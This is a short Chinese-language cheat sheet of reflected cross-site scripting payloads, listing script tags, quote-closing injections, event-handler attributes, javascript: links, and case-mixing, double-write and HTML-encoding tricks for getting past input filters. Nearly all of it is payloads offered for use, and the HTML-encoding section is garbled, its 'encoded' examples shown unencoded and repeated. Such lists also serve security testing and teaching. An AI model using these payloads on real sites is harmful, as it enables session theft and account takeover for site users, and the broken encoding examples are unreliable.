Xss反射型常用语法：

1. 普通语法:  <script>alert(1)</script>
2. 构造闭合语法：  "><script>alert(1)</script>
3. 当引号被转义时的语法:   1' οnclick='alert(2)' 再次点击输入框时就会出现弹窗
4. 当3.的双引号不行时则考虑使用双引号：1 "onclick"=alert(2)
5. 当</>被过滤时便不能用标签可以考虑使用出发事件： 1"  οnmοuseοver="alert(1)"
6. 当5.的双引号不行时则考虑使用单引号：  1'  οnmοuseοver='alert(1)'
7. 当上述几种都不行时可以考虑使用a标签：11"><a href="javascript:alert(1)">
8. 大小写绕过：11"><a HREF="javascript:alert(1)">      "><sCript>alert(1)</scRipt>

<SCRIPT>alert(1)</SCRIPT>

    9.双写绕过："><SCRSCRIPTIPT>alert(/xss/)</SCRSCRIPTIPT>

    10.Html编码绕过：

javaSCRIPT:alert(1)

这里属于直接编码所所有的进行

把所需要过滤的字段进行html编码就可以进行绕过，这里绕过的时比如

href     href

SCRIPT    SCRIPT